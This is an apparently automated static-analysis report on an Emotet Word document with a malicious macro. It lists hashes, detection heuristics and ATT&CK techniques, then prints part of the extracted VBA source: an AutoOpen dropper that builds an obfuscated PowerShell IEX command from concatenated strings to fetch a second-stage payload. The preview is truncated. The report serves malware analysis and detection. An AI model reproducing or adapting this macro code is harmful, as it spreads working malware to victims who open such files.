Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 0fb4d4a2f2bece33…

MALICIOUS

Office (OLE)

108.5 KB Created: 2018-06-20 16:48:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 537b1760f95f665113ce486c1d7290ad SHA-1: cbdab97cf104a14093bf2d81a692ecd2e7b01179 SHA-256: 0fb4d4a2f2bece33f5efe1ab7abbba9f728b74a30cbf91530edfc497cfde9f1c
242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function. This macro is designed to execute a PowerShell command, reconstructed from concatenated strings, which likely downloads and executes a second-stage payload. The ClamAV detection name also strongly suggests the Emotet family.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6878585-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6878585-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10922 bytes
SHA-256: d5651a954127d0143cbfee8faf12ee7f2f51be7c0e331b49e9d2f9c2b273fb46
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "MwvQXlFYLAM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TWsSKiaVwtTDK"
Function CWqiKVjzwIw()
On Error Resume Next
istiG = 56728
jHRjQ = CDate(TLqnH + Sin(37310 + 41363) * 25455 * CInt(6068))
DaIcE = pPjjGi
ikKiY = CDate(27474)
BbJrL = CByte(vitsKh)
MooXRt = 44754
DizHtnk = "OwerSHe" + "ll " + ". " + "( " + "$VErBoS" + "eprefEREnCE"
CpddLW = 5245
uOoPj = CDate(wdzFz + Sin(37873 + 98856) * 67727 * CInt(59444))
UzzcYo = ttkbHX
CCkBp = CDate(12949)
krLGf = CByte(GEPlMs)
JaaDik = 78465
djUAjOX = ".tOStRI" + "nG()[1,3]" + "+'X'" + "-JOIN'')("
HiDWLO = 52525
XImYc = CDate(wviTFA + Sin(84042 + 85632) * 70115 * CInt(18596))
AwzpEl = aYomW
hqFICI = CDate(80707)
tjXNPB = CByte(inGkvV)
XWdcFK = 76649
KHPjUcwpYPU = " ('21" + "F70e9" + "4P88Z114e121P91" + "r17F12P17F95w84" + "@70l" + "28r94l83w91_84" + "P82F69G1"
EPYmHk = 26852
zUhVik = CDate(kTzhUR + Sin(10318 + 33061) * 99517 * CInt(61745))
PFUMqs = wsUZTS
zEoMYm = CDate(23080)
HoGwh = CByte(KqjTW)
YNfrXQ = 80902
rPjKhISTXSj = "7r6" + "7@80l" + "95P85l" + "94G92@10@21G1" + "19F" + "75r103G71l" + "101@10" + "0F17P" + "12_1"
plMLI = 92768
isvMRf = CDate(pIGqiA + Sin(64244 + 71454) * 75346 * CInt(39442))
wJnIS = bFTOW
HLAfwQ = CDate(3089)
nojwXG = CByte(kipdm)
aZXilB = 26475
StbXGlIvONn = "7@" + "95Z84w70@28r9" + "4l83P91@84F8" + "2G69l17G98l72r6" + "6Z69_84Z92" + "r31w1" + "27F84F" + "69@31e102_84e" + "83F114l93P88_84"
RRjhBA = 71776
pZoCi = CDate(Wzrmj + Sin(36397 + 46462) * 27597 * CInt(86833))
JsHTUR = WvBsPd
MMhSEQ = CDate(8549)
DrZaNK = CByte(RrtWZo)
mFbKvW = 66637
dDvrlZJQiMs = "l95Z69F10r21w" + "103_127l7" + "5@95F11" + "8e17@12w" + "17Z2" + "2P8"
nXnQX = 73569
SjqMs = CDate(zQjZb + Sin(29244 + 2201) * 62903 * CInt(50274))
uwkUFI = fiNSEu
GhQHV = CDate(28674)
VMwStI = CByte(JkBXn)
cYusC = 70376
jwDfQzXfnz = "9r69_69w6" + "5r11Z30Z30" + "P90l67G68" + "l87G86_64l66w65"
OYzZV = 62794
EclInT = CDate(VtKLi + Sin(75543 + 10822) * 41182 * CInt(52538))
XCmbms = OBKDv
LiijvV = CDate(51055)
ZImlj = CByte(VLkuOJ)
laqJu = 49954
vAWXQTXpUX = "l31P" + "82e94@9" + "2@30G123_8Z121" + "P9w" + "91e30F" + "113@89@6" + "9P69e65e11r3" + "0Z30Z93w84_"
PHQEn = 33731
mjNkoa = CDate(fiZlv + Sin(16550 + 95637) * 77241 * CInt(7681))
qsErF = PCzRi
jumIFZ = CDate(74540)
DazFMD = CByte(XTnKS)
csYMp = 82608
pBOPfDIRLS = "89P68@68G89_88G" + "84F68F31@82e9" + "4@92@" + "30G114Z9" + "9_93w101l88" + "@70Z100e30@11" + "3w89" + "e69r69@65@" + "11w30_30@"
UbSavD = 61774
SVrUj = CDate(UjSOHw + Sin(32044 + 95852) * 81083 * CInt(60252))
fcXLs = WilTln
whrIW = CDate(48386)
YXalG = CByte(EOhhFj)
jVYdzs = 79010
pWwPz = "85P80w88_89@" + "80@6" + "9Z66Z68G80e67e" + "92Z80P85@80P65Z" + "68w67F70@94r90"
CWqiKVjzwIw = DizHtnk + djUAjOX + KHPjUcwpYPU + rPjKhISTXSj + StbXGlIvONn + dDvrlZJQiMs + jwDfQzXfnz + vAWXQTXpUX + pBOPfDIRLS + pWwPz
End Function
Function amNPIo()
On Error Resume Next
KYuaa = 45073
pCmzQZ = CDate(JrwQv + Sin(54020 + 41163) * 87511 * CInt(54847))
LrhRYV = LTKfi
vdjwmu = CDate(61036)
GPZICV = CByte(tBCZmU)
FIOUw = 35596
PYOcd = "l84" + "@67F69@94G31F82" + "F94@92" + "F30e5@" + "87" + "l114@72l2F" + "70@" + "112_"
NrqiXI = 58253
sBBvWG = CDate(FoHZNs + Sin(89997 + 74137) * 16941 * CInt(71165))
YLjVwL = qAPIn
VnwPoi = CDate(37450)
WYKZkG = CByte(bCzOR)
DFDar = 21047
YRcBVki = "30e113" + "e89@69F69" + "@65" + "P11Z30r" + "30_"
XNUch = 71242
CQOAG = CDate(YhOHGW + Sin(10901 + 6114) * 49485 * CInt(27569))
JsHjm = TSriu
fGRzAV = CDate(23266)
naBoi = CByte(GHDWEp)
AiVOq = 78825
iArFZcc = "3F1Z3w31_7_2e" + "31_0" + "G1l4w31F9l7" + "e30l112Z" + "91P120l1"
GIOEGw = 42872
qtmtY = CDate(Pbfmj + Sin(47855 + 17944) * 94549 * CInt(84937))
zLGNK = XrXuVB
IvhOz = CDate(57910)
PzTjcj = CByte(dqcFm)
moXMi = 51097
FaDTEQvtwf = "26_94G97P30@11" + "3w89w69e69" + "_65@11" + "F3"
iM
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.